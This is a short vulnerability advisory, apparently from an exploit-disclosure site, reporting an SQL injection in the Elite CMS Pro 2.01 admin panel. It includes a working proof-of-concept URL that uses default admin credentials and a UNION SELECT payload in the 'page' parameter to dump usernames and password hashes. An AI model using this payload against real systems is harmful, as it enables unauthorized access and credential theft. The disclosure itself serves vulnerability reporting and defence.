Elite CMS Pro - Version 2.01 Admin Panel sql injection Vulnerability

2018.06.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

I found an Sql injection Vulnerability on EliteCMS Pro 2.01. POC: ------ - go http://demo.elitecms.net/admin/ - login as admin:admin - in http://demo.elitecms.net/admin/add_sidebar.php the "?page=" parameter is vulnerable. you can inject here. - example: http://demo.elitecms.net/admin/add_sidebar.php?page=-5+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000GrOUP_CONCAT(user_name,%22%20%22,h_password)*/,6,7,8,9,10,11,12,13,14,15+from+/*!50000users*/ -------- Selim Can Ă–zdemir telegram: @manthatyoufear twitter: @00selimcan mail: ozdemirselimcan@gmail.com


Vote for this issue:
77%
23%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top